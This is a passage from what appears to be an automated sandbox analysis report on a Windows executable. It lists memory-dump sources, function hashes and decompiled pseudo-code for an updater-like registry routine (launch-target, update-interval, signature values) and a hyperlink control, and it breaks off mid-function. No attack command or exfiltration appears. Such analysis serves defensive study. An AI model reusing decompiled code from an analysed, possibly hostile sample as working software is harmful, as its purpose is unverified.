Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$_malloc
String ID: list<T> too long
API String ID: 2877152494-4027344264
Opcode ID: 1241da44c5c531507161cd9dac542ca9e3c3926c53f69e78b333a84ae1efe53f
Instruction ID: 2c0a02a71642df0239427e5bd4fb3dceeead5c22c310ea855e706e07e5a496cd
Opcode Fuzzy Hash: 1241da44c5c531507161cd9dac542ca9e3c3926c53f69e78b333a84ae1efe53f
Instruction Fuzzy Hash: 80C1CBB16053518FC720DF29C880A6FBBE5BF88704F44892EF9958B351DB38E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004390A0, Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

%05d, xrefs: 004392C4
00000, xrefs: 004391B9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %05d$00000
API String ID: 0-3336089879
Opcode ID: fa5f6d8c331f341ff5674ef098f5672fc36b2b7ca7c23bdc1941d36929ef635c
Instruction ID: 0554850cc9805b4e1c5f0dfdfb3160467430fa3e4c53ba4c1d37daa13430e34c
Opcode Fuzzy Hash: fa5f6d8c331f341ff5674ef098f5672fc36b2b7ca7c23bdc1941d36929ef635c
Instruction Fuzzy Hash: 16B1CB705083818BC754CF29C880A5BB7E4FFD9314F148A2EF49A973A1DB79E845CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0042E630, Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

Extensions, xrefs: 0042E722, 0042E7EE, 0042E87D
LoadExtensions, xrefs: 0042E6AA

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentOpenQueryUserValue
String ID: Extensions$LoadExtensions
API String ID: 3731316095-2899561765
Opcode ID: af2942d599b250f2fc23336e97c566b07a67797682747b3f85f847f23e6cd7c0
Instruction ID: 3e9b01a3a3c95ba8a454ff9e406aee4cd41d88347dd0b59e60976da50a3e7f36
Opcode Fuzzy Hash: af2942d599b250f2fc23336e97c566b07a67797682747b3f85f847f23e6cd7c0
Instruction Fuzzy Hash: FA916CB1A083909BD320DF66D84175BBBE4BFC5708F44492EF5C997281D7B89908CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0048E560, Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

d, xrefs: 0048EA2E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: fbe51a7e8b4bc7042275d301282d1c150859c74bafce63f53ba29cf72fd1d025
Instruction ID: de0400b26e4fb62ee8ba7b21537c353476103ec747c3c9e2cdf53ec63d4300cb
Opcode Fuzzy Hash: fbe51a7e8b4bc7042275d301282d1c150859c74bafce63f53ba29cf72fd1d025
Instruction Fuzzy Hash: F1025C705083808BD770EF2AC58079FBBE5AF95304F508E2EE49997292E778D445CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00469760, Relevance: 1.5, APIs: 1, Instructions: 36comCOMMON

Download Yara Rule

APIs

Part of subcall function 00405250: std::_Xinvalid_argument.LIBCPMT ref: 00405268

CoCreateInstance.OLE32(005217DC,00000000,00000017,00535150,?,00000000,09D48295,?,00000000,00510528,000000FF,0043B1D9), ref: 004697CA

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstanceXinvalid_argumentstd::_
String ID:
API String ID: 1179919883-0
Opcode ID: 080642b521dd6857b74997df2982f30b8a2bc6692a122e802058fc9531c588a1
Instruction ID: 8a81a3648b01c21e72f5aaff4b1c42bd19797d7b45ecd8c2c805a268a8ed2e7a
Opcode Fuzzy Hash: 080642b521dd6857b74997df2982f30b8a2bc6692a122e802058fc9531c588a1
Instruction Fuzzy Hash: 290146B5118B41EFD310CF14D801B52BBE8FF49B20F400A1AE4A497BD0E3B8A448CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045E020, Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9bcb9607cc795f1c4e31eff8b1355f193936603e22535ffaad7b818de2aa3d
Instruction ID: 5934639623f3e2b9c5acdda2a658e2162e1eeb20c2eb1f55fc88803dbb3501e3
Opcode Fuzzy Hash: 5f9bcb9607cc795f1c4e31eff8b1355f193936603e22535ffaad7b818de2aa3d
Instruction Fuzzy Hash: 9BE15C71A08345CFC728DF29C48065FB7E1BBC9355F10492EE99987342E735AA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00423530, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9411b951ac964ab8e53f69b4a45f48a58cfc104d254cb5b40998ca765604fa
Instruction ID: 2d04a22f79c01188426258c7678f8d13f4657393d37c863c83870a11ac1b0851
Opcode Fuzzy Hash: 8f9411b951ac964ab8e53f69b4a45f48a58cfc104d254cb5b40998ca765604fa
Instruction Fuzzy Hash: B6D19B716042118FC718DF19D490A2BB7F2BFC8319F588A5EE8498B392D738EE41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004F001D, Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b5f23508a568411a9fdb63b985124789bf73e9e70971bf958673b068926fa5
Instruction ID: d01a343d353a5b293067840b54c58de41a468f235a9b63f4929e2902f3faece7
Opcode Fuzzy Hash: 89b5f23508a568411a9fdb63b985124789bf73e9e70971bf958673b068926fa5
Instruction Fuzzy Hash: 0C716B357001249FCB09EE78C6E47BA77A3AB8E320F30457DE607C774AEA799C419661

Uniqueness

Uniqueness Score: -1.00%

Function 0047A410, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59ea2433e7f661e7d6a85c5043632ba6fd363395fef24f6a817513530c37c4f
Instruction ID: 32a8c7a8fa6a33ce7b34fd16866dcb10a8fb2764480606a7bfb8c34f44d1b468
Opcode Fuzzy Hash: c59ea2433e7f661e7d6a85c5043632ba6fd363395fef24f6a817513530c37c4f
Instruction Fuzzy Hash: CC417971504301CFC764DF29C991A5BB7E1FBC8714F518A2EE89A87306D738E885CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00493790, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32bbaf023fd251b0417445286d8eeb1348442b6ae3ae646fb72e6ac615841b63
Instruction ID: 5cab5a34e323a761ca5b38006bbdaed4dd2e38290422f091f347eb3fb26b0154
Opcode Fuzzy Hash: 32bbaf023fd251b0417445286d8eeb1348442b6ae3ae646fb72e6ac615841b63
Instruction Fuzzy Hash: 36313B61A093808FDF04DA18C8847267FC2A75B324F19C7BAE856573D6C2289D48C3CA

Uniqueness

Uniqueness Score: -1.00%

Function 004547A0, Relevance: 38.8, APIs: 11, Strings: 11, Instructions: 324
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004547A0(void* __edi) {
				int _v4;
				char _v12;
				void* _v24;
				char _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t99;
				char* _t101;
				void* _t104;
				void** _t135;
				void* _t139;
				void* _t152;
				void* _t153;
				void* _t157;
				short* _t163;
				short* _t170;
				intOrPtr _t186;
				void* _t190;
				intOrPtr _t198;
				void* _t199;
				short* _t225;
				short* _t226;
				void* _t241;
				void** _t244;
				void* _t253;
				void** _t254;
				char _t256;
				void* _t260;
				signed int _t261;
				void* _t263;
				void* _t269;
				void* _t270;
				void* _t273;
				void* _t274;

				_t241 = __edi;
				_push(0xffffffff);
				_push(0x50eae8);
				_push( *[fs:0x0]);
				_t261 = _t260 - 0x20;
				_t99 =  *0x5596fc; // 0x9d48295
				_push(_t99 ^ _t261);
				_t101 =  &_v12;
				 *[fs:0x0] = _t101;
				if( *((intOrPtr*)(__edi + 0xa4)) == 0) {
					L28:
					 *[fs:0x0] = _v12;
					return _t101;
				}
				if( *((intOrPtr*)(__edi + 4)) != 0) {
					_t186 =  *((intOrPtr*)( *((intOrPtr*)(__edi + 4))));
					_t230 =  *((intOrPtr*)(_t186 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t186 + 4))))();
				}
				_t203 =  *((intOrPtr*)(_t241 + 0xa4));
				_push( &_v44);
				_v44 = 0;
				_t104 = E004546C0(L"version",  *((intOrPtr*)(_t241 + 0xa4)));
				_t263 = _t261 + 4;
				if(_t104 == 0) {
					_t244 =  *(_t241 + 0x18);
					_t190 = _t244[0x11];
					if(_t190 != 0) {
						_push( *((intOrPtr*)(_t190 + 0x10)));
						E004EF7B8();
						_push(_t190);
						L004EEDBE();
						_t263 = _t263 + 8;
					}
					_t231 = _t244[1];
					_t244[0x11] = 0;
					_v40 = 0;
					if(RegCreateKeyExW( *_t244, _t244[1], 0, 0, 0, 0x20006, 0,  &_v40, 0) == 0) {
						_t226 =  *0x55b1f4; // 0x534240
						_t231 = _v40;
						RegDeleteValueW(_v40, _t226);
						RegCloseKey(_v40);
					}
				} else {
					_t256 = _v44;
					E004571A0(_t256,  &_v32, _t203, _t230, _t241);
					_push(_t256);
					_v4 = 0;
					E004EF7B8();
					_v44 = 0;
					L00456F40(_t230,  *(_t241 + 0x18), 1);
					_v12 = 0xffffffff;
					_t231 = _v24;
					_push(_v24);
					E004EF7B8();
					_t263 = _t263 + 8;
				}
				_push( &_v44);
				E004546C0(L"url",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 2, _t231,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				E004546C0(L"description",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 3, _v44,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				E004546C0(L"about-url",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 4,  &_v44,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				E004546C0(L"launch-action",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 5,  &_v44,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				E004546C0(L"launch-target",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 6, _v44,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_t135 =  *(_t241 + 0x18);
				_t269 = _t263 + 0x28;
				_v36 = 0;
				_v44 = 0;
				_t135[0xe] = 0;
				_v40 = 0;
				_t236 =  *_t135;
				if(RegCreateKeyExW( *_t135, _t135[1], 0, 0, 0, 0x20006, 0,  &_v40, 0) == 0) {
					if(_v36 == 0) {
						_t170 =  *0x55b1e8; // 0x5342a8
						RegDeleteValueW(_v40, _t170);
					} else {
						_t225 =  *0x55b1e8; // 0x5342a8
						RegSetValueExW(_v40, _t225, 0, 4,  &_v36, 4);
					}
					_t236 = _v40;
					RegCloseKey(_v40);
				}
				_push( &_v44);
				_t139 = E004546C0(L"launch-target-size",  *((intOrPtr*)(_t241 + 0xa4)));
				_t270 = _t269 + 4;
				if(_t139 != 0) {
					 *((intOrPtr*)(E004F11BC(6))) = 0;
					_t157 = E004F36DC(_v44, 0, 0xa);
					_t274 = _t270 + 0xc;
					_t253 = _t157;
					if( *((intOrPtr*)(E004F11BC(6))) == 0x22 || _t253 == 0) {
						_t254 =  *(_t241 + 0x18);
						_t199 = _t254[0x11];
						if(_t199 != 0) {
							_push( *((intOrPtr*)(_t199 + 0x10)));
							E004EF7B8();
							_push(_t199);
							L004EEDBE();
							_t274 = _t274 + 8;
						}
						_t236 =  *_t254;
						_t254[0x11] = 0;
						_v36 = 0;
						if(RegCreateKeyExW( *_t254, _t254[1], 0, 0, 0, 0x20006, 0,  &_v36, 0) == 0) {
							_t163 =  *0x55b1f4; // 0x534240
							RegDeleteValueW(_v36, _t163);
							_t236 = _v36;
							RegCloseKey(_v36);
						}
					} else {
						L00456EB0( *(_t241 + 0x18), 1, _t253);
					}
					_push(_v44);
					E004EF7B8();
					_t270 = _t274 + 4;
					_v44 = 0;
				}
				_push( &_v44);
				E004546C0(L"launch-parameter",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 7, _t236,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				E004546C0(L"signature",  *((intOrPtr*)(_t241 + 0xa4)));
				L00456D70(_v44, 9, _v44,  *(_t241 + 0x18));
				_push(_v44);
				E004EF7B8();
				_push( &_v44);
				_v44 = 0;
				_t152 = E004546C0(L"update-interval",  *((intOrPtr*)(_t241 + 0xa4)));
				_t198 = _v44;
				_t273 = _t270 + 0x14;
				if(_t152 == 0) {
					L26:
					_t153 = 0x15180;
					goto L27;
				} else {
					_push(_t198);
					_t153 = L004F2D77();
					_t273 = _t273 + 4;
					if(_t153 < 0xe10 || _t153 > 0x93a80) {
						goto L26;
					} else {
						L27:
						L00456EB0( *(_t241 + 0x18), 2, _t153);
						_push(_t198);
						_t101 = E004EF7B8();
						_t261 = _t273 + 4;
						goto L28;
					}
				}
			}

0x004547a0
0x004547a0
0x004547a2
0x004547ad
0x004547ae
0x004547b4
0x004547bb
0x004547bc
0x004547c0
0x004547ce
0x00454bb3
0x00454bb7
0x00454bc5
0x00454bc5
0x004547d7
0x004547dc
0x004547de
0x004547e1
0x004547e1
0x004547e3
0x004547ed
0x004547f3
0x004547f7
0x004547fc
0x00454801
0x00454847
0x0045484a
0x0045484f
0x00454854
0x00454855
0x0045485a
0x0045485b
0x00454860
0x00454860
0x00454863
0x00454879
0x0045487c
0x00454888
0x0045488a
0x00454890
0x00454896
0x004548a1
0x004548a1
0x00454803
0x00454803
0x0045480d
0x00454812
0x00454813
0x00454817
0x00454827
0x0045482b
0x00454830
0x00454838
0x0045483c
0x0045483d
0x00454842
0x00454842
0x004548ab
0x004548b7
0x004548cb
0x004548d4
0x004548d5
0x004548e4
0x004548ea
0x004548ee
0x00454902
0x0045490b
0x0045490c
0x0045491b
0x00454921
0x00454925
0x00454939
0x00454942
0x00454943
0x0045494c
0x00454958
0x0045495c
0x00454970
0x00454979
0x0045497a
0x00454989
0x0045498f
0x00454993
0x004549a7
0x004549b0
0x004549b1
0x004549b6
0x004549b9
0x004549c8
0x004549cc
0x004549d0
0x004549d3
0x004549db
0x004549e9
0x004549ef
0x00454a0f
0x00454a1a
0x004549f1
0x004549f1
0x00454a07
0x00454a07
0x00454a20
0x00454a25
0x00454a25
0x00454a35
0x00454a3b
0x00454a40
0x00454a45
0x00454a58
0x00454a5a
0x00454a5f
0x00454a62
0x00454a6c
0x00454a82
0x00454a85
0x00454a8a
0x00454a8f
0x00454a90
0x00454a95
0x00454a96
0x00454a9b
0x00454a9b
0x00454aa1
0x00454ab4
0x00454ab7
0x00454ac3
0x00454ac5
0x00454ad0
0x00454ad6
0x00454adb
0x00454adb
0x00454a72
0x00454a7b
0x00454a7b
0x00454ae5
0x00454ae6
0x00454aeb
0x00454aee
0x00454aee
0x00454af6
0x00454b02
0x00454b16
0x00454b1f
0x00454b20
0x00454b2f
0x00454b35
0x00454b39
0x00454b4d
0x00454b56
0x00454b57
0x00454b66
0x00454b6c
0x00454b70
0x00454b75
0x00454b79
0x00454b7e
0x00454b97
0x00454b97
0x00000000
0x00454b80
0x00454b80
0x00454b81
0x00454b86
0x00454b8e
0x00000000
0x00454b9c
0x00454b9c
0x00454ba5
0x00454baa
0x00454bab
0x00454bb0
0x00000000
0x00454bb0
0x00454b8e

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00020006,00000000,?,00000000,00000001,00454C09,?,?,?,?,00000001), ref: 00454880
RegDeleteValueW.ADVAPI32(?,00534240), ref: 00454896
RegCloseKey.ADVAPI32(?), ref: 004548A1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004549E1
RegSetValueExW.ADVAPI32(?,005342A8,00000000,00000004,?,00000004), ref: 00454A07
RegDeleteValueW.ADVAPI32(?,005342A8), ref: 00454A1A
RegCloseKey.ADVAPI32(?), ref: 00454A25
_wcstoul.LIBCMT ref: 00454A5A
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454ABB
RegDeleteValueW.ADVAPI32(00000000,00534240,?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454AD0
RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00454ADB

Strings

version, xrefs: 004547EE
launch-target-size, xrefs: 00454A36
@BS, xrefs: 0045488A, 00454AC5
about-url, xrefs: 0045491C
launch-target, xrefs: 0045498A
update-interval, xrefs: 00454B67
description, xrefs: 004548E5
signature, xrefs: 00454B30
url, xrefs: 004548B2
launch-parameter, xrefs: 00454AFD
launch-action, xrefs: 00454953

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$CloseCreateDelete$_wcstoul
String ID: @BS$about-url$description$launch-action$launch-parameter$launch-target$launch-target-size$signature$update-interval$url$version
API String ID: 1480302049-2771771197
Opcode ID: 960b6d2c93fc298d009a388e9c2ad43fab91a32960d43f95370bf528bea98839
Instruction ID: 404547cee46f91873dd8728ad4a98bac97951320d52ee59b3ed3a689a88e1261
Opcode Fuzzy Hash: 960b6d2c93fc298d009a388e9c2ad43fab91a32960d43f95370bf528bea98839
Instruction Fuzzy Hash: 2FC18BB5604745AFC300DF66D881A1BB7A9FF99309F00091EF9459B352D738F948CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004492A0, Relevance: 38.8, APIs: 17, Strings: 5, Instructions: 263
windowregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004492A0(unsigned int __ecx) {
				signed int _v8;
				short _v10;
				short _v14;
				short _v18;
				short _v22;
				short _v26;
				short _v30;
				char _v32;
				short _v34;
				short _v38;
				short _v42;
				short _v46;
				short _v48;
				struct tagLOGFONTW _v148;
				WCHAR* _v152;
				unsigned int _v156;
				long _v160;
				long _v164;
				void* _v168;
				void* _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t85;
				int _t91;
				void* _t93;
				short _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				WCHAR* _t109;
				int _t110;
				long _t114;
				struct HFONT__* _t118;
				signed int _t122;
				signed int _t125;
				struct HINSTANCE__* _t130;
				int _t131;
				long _t149;
				intOrPtr _t151;
				intOrPtr _t153;
				int _t163;
				void* _t166;
				signed int _t170;
				WCHAR* _t171;

				_t85 =  *0x5596fc; // 0x9d48295
				_v8 = _t85 ^ _t170;
				_t168 = __ecx;
				_v156 = __ecx;
				_v48 = 0;
				_v46 = 0;
				_v42 = 0;
				_v38 = 0;
				_v34 = 0;
				if(GetClassNameW( *(__ecx + 4),  &_v48, 8) != 0 && lstrcmpiW( &_v48, L"static") == 0) {
					_t122 = GetWindowLongW(_t168[1], 0xfffffff0);
					_t149 = _t122 | 0x00000100;
					if(_t122 != _t149) {
						SetWindowLongW(_t168[1], 0xfffffff0, _t149);
					}
					_t125 = GetWindowLongW(_t168[1], 0xfffffff0) & 0x000000ff;
					if(_t125 == 3 || _t125 == 4 || _t125 == 5 || _t125 == 6 || _t125 == 7 || _t125 == 8 || _t125 == 9 || _t125 == 0xd || _t125 == 0xe || _t125 == 0xf) {
						_t168[0x16] = _t168[0x16] & 0x000000fe;
					}
				}
				_t168[0xb] = LoadCursorW(0, 0x7f89);
				if((_t168[0x16] & 0x00000001) != 0) {
					_t114 = SendMessageW(GetParent(_t168[1]), 0x31, 0, 0);
					_t168[0xd] = _t114;
					if(_t114 == 0) {
						_t168[0xd] = GetStockObject(0xd);
					}
					_t166 = _t168[0xd];
					if(_t166 != 0 && _t168[0xc] == 0) {
						_v148.lfHeight = 0;
						L004F3CE0( &(_v148.lfWidth), 0, 0x58);
						_t171 =  &(_t171[6]);
						GetObjectW(_t166, 0x5c,  &_v148);
						if((_t168[0x15] & 0x00000030) != 0x30) {
							__eflags = _t168[0x15] & 0x00000001;
							if((_t168[0x15] & 0x00000001) == 0) {
								_v148.lfUnderline = 1;
							}
						} else {
							_v148.lfWeight = 0x2bc;
						}
						_t118 = CreateFontIndirectW( &_v148);
						_t168[0x16] = _t168[0x16] | 0x00000008;
						_t168[0xc] = _t118;
					}
				}
				_t130 =  *0x55e4a4; // 0x0
				_t151 =  *0x55abd4; // 0x0
				_t131 =  *0x55abc8; // 0x80000000
				_t91 =  *0x55abcc; // 0x80000000
				_t153 =  *0x55abd0; // 0x0
				_t154 = _t153 - _t131;
				_t127 =  &(_t168[0x12]);
				 *_t127 = CreateWindowExW(0, L"tooltips_class32", 0, 0, _t131, _t91, _t153 - _t131, _t151 - _t91, _t168[1], 0, _t130, 0);
				if(_t168[9] == 0) {
					_t163 = GetWindowTextLengthW(_t168[1]);
					if(_t163 > 0) {
						_t43 = _t163 + 2; // 0x2
						E004FD190(_t163 + _t43);
						_t109 = _t171;
						_v152 = _t109;
						_t110 = GetWindowTextW(_t168[1], _t109, _t163 + 1);
						_t195 = _t110;
						if(_t110 != 0) {
							L00449880(_t168, _t154, _v152, _t195);
						}
					}
				}
				_t132 = _t168;
				_t93 = E004495F0(_t168, _t154);
				_t161 = 0;
				if(_t168[0xa] != 0) {
					L33:
					SendMessageW( *_t127, 0x401, 1, _t161);
					 *_t171 = _t168[0xa];
					_t155 =  &(_t168[0xe]);
					_v152 = _t171;
					_t93 = L00448FC0(_t127, _t168[1],  &(_t168[0xe]), _t132);
					goto L34;
				} else {
					_t155 = _t168[0x15] >> 2;
					if((_t168[0x15] >> 0x00000002 & 0x00000001) != 0) {
						goto L33;
					}
					_t142 = _t168[9];
					_t198 = _t168[9];
					if(_t168[9] != 0) {
						_t127 = _t168;
						_t93 = L004489F0(_t168, _t142, _t155, _t198);
					}
					L34:
					if((_t168[0x16] & 0x00000001) != 0) {
						_push( &_v168);
						_t155 = 0x2001f;
						_v168 = _t161;
						_v164 = _t161;
						_v160 = _t161;
						_t99 = E00401710(L"Software\\Microsoft\\Internet Explorer\\Settings", 0x80000001, 0x2001f);
						if(_t99 == 0) {
							_t127 = 0xc;
							_v32 = _t99;
							_v30 = _t99;
							_v26 = _t99;
							_v22 = _t99;
							_v18 = _t99;
							_v14 = _t99;
							_v10 = _t99;
							_v152 = 0xc;
							if(L0040EDA0( &_v152,  &_v32,  &_v168, L"Anchor Color") == 0) {
								_t104 = L004499B0( &_v32, _t170);
								if(_t104 != 0xffffffff) {
									_t155 = _v156;
									 *((intOrPtr*)(_v156 + 0x4c)) = _t104;
								}
							}
							_t161 =  &_v152;
							_t168 =  &_v32;
							_v152 = _t127;
